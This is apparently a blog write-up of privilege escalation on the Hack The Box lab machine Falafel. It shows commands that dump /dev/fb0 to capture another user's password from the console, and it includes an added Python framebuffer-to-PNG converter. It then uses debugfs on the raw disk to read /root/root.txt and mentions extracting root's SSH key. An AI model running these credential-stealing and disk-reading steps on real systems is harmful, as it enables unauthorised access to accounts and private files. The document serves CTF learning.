akmalhisyam.my

HTB Falafel privilege escalation writeup


User moshe is in the video group

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

The framebuffer device (/dev/fb0) is owned by the video group and is group-readable, so moshe can read whatever is currently drawn on the console

$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0

Dump the framebuffer (a plain read gives every pixel of the current screen as raw bytes)

$ cat /dev/fb0 > .ayamkambing

Transfer the dump to your machine and find a way to convert the raw framebuffer into an image. The dump has no header, so you also need the screen geometry to decode it; on the target it can be read from sysfs (/sys/class/graphics/fb0/virtual_size, /sys/class/graphics/fb0/bits_per_pixel and /sys/class/graphics/fb0/stride).

I use this - fb2png

That tool only takes /dev/fb0 as input, so I copied the dump to my own framebuffer first. Note that this needs write access to your own /dev/fb0 (root or video group) and only produces a readable picture if your local resolution and pixel format match the target's; otherwise the image comes out scrambled and you have to decode the dump with the target's geometry instead.

[akmal@akmal ~]$ cat ../.ayamkambing > /dev/fb0
[akmal@akmal ~]$ ./fb2png

You'll get a screenshot of the current console, and in this case user yossi's password is visible on it. Use su to switch to user yossi (or SSH as yossi)
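The dump-and-convert step above, done without fb2png and without replaying the dump through a local framebuffer. This is an added example, not code from the original writeup: a stdlib-only Python converter that takes the raw /dev/fb0 dump plus the geometry read from /sys/class/graphics/fb0 and writes a PNG. It assumes the two pixel layouts usual on Linux consoles (32 bpp BGRX and 16 bpp RGB565); the Falafel box's actual layout is not stated on the page, so check bits_per_pixel before trusting the colours. The 2x2 sample framebuffer at the bottom is constructed for illustration.

```python
import struct
import sys
import zlib


def parse_fb_geometry(virtual_size, bits_per_pixel):
    """Parse the text of /sys/class/graphics/fb0/virtual_size ("W,H")
    and /sys/class/graphics/fb0/bits_per_pixel into (width, height, bpp)."""
    w, h = (int(v) for v in virtual_size.strip().split(","))
    return w, h, int(bits_per_pixel.strip())


def fb_to_rgb(raw, width, height, bpp, stride=None):
    """Convert raw framebuffer bytes to packed 24-bit RGB.

    stride is the row length in bytes (/sys/class/graphics/fb0/stride); it can
    be larger than width*bytes_per_pixel when rows are padded. Assumed layouts:
    32 bpp = B,G,R,X per pixel; 16 bpp = little-endian RGB565.
    """
    bytes_pp = bpp // 8
    if stride is None:
        stride = width * bytes_pp
    if len(raw) < stride * height:
        # A short dump almost always means the geometry is wrong, not the dump.
        raise ValueError("dump is shorter than stride*height; wrong geometry?")
    if bpp not in (32, 16):
        raise ValueError("unsupported bits_per_pixel: %d" % bpp)
    out = bytearray()
    for y in range(height):
        row = raw[y * stride: y * stride + width * bytes_pp]
        for x in range(width):
            if bpp == 32:
                b, g, r = row[4 * x], row[4 * x + 1], row[4 * x + 2]
            else:
                px = row[2 * x] | (row[2 * x + 1] << 8)
                r = ((px >> 11) & 0x1F) * 255 // 31
                g = ((px >> 5) & 0x3F) * 255 // 63
                b = (px & 0x1F) * 255 // 31
            out += bytes((r, g, b))
    return bytes(out)


def rgb_to_png(rgb, width, height):
    """Minimal PNG encoder: 8-bit RGB, filter type 0 on every scanline."""
    def chunk(tag, data):
        body = tag + data
        return (struct.pack(">I", len(data)) + body
                + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF))

    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    scanlines = b"".join(b"\x00" + rgb[y * width * 3:(y + 1) * width * 3]
                         for y in range(height))
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(scanlines)) + chunk(b"IEND", b""))


def fb_dump_to_png(raw, width, height, bpp, stride=None):
    """Whole pipeline: raw /dev/fb0 dump -> PNG bytes."""
    return rgb_to_png(fb_to_rgb(raw, width, height, bpp, stride), width, height)


# Constructed 2x2 BGRX sample (red, green / blue, white), used for the test below.
SAMPLE_BGRX = bytes([0, 0, 255, 0, 0, 255, 0, 0,
                     255, 0, 0, 0, 255, 255, 255, 0])

if __name__ == "__main__":
    # Usage: python3 fbdump2png.py DUMP WIDTH HEIGHT BPP OUT.png [STRIDE]
    # WIDTH,HEIGHT come from virtual_size, BPP from bits_per_pixel, STRIDE from stride.
    dump, w, h, bpp, out = sys.argv[1:6]
    stride = int(sys.argv[6]) if len(sys.argv) > 6 else None
    with open(dump, "rb") as f:
        raw = f.read()
    with open(out, "wb") as f:
        f.write(fb_dump_to_png(raw, int(w), int(h), int(bpp), stride))
```

Run it as `python3 fbdump2png.py .ayamkambing 1024 768 32 screen.png` with the numbers taken from the target's sysfs; if the picture looks sheared, the stride is wrong, and if the colours are swapped the pixel order differs from the BGRX assumption.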

$ su - yossi
Password:
yossi@falafel:~$

yossi is in the disk group

yossi@falafel:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)

Initially I tried to dump the whole of /dev/sda1, but was greeted with a disk-full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run commands against the raw disk. It works because debugfs parses the ext2/3/4 on-disk structures itself rather than going through the mounted filesystem, so the only check that matters is read access to the block device, which the disk group grants; the mode bits on /root and the files under it are never consulted. Besides cat, its ls and dump commands (for example "ls -l /root" or "dump /root/.ssh/id_rsa /tmp/id_rsa") are handy for finding and pulling out other files from the image.

yossi@falafel:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1

Yay!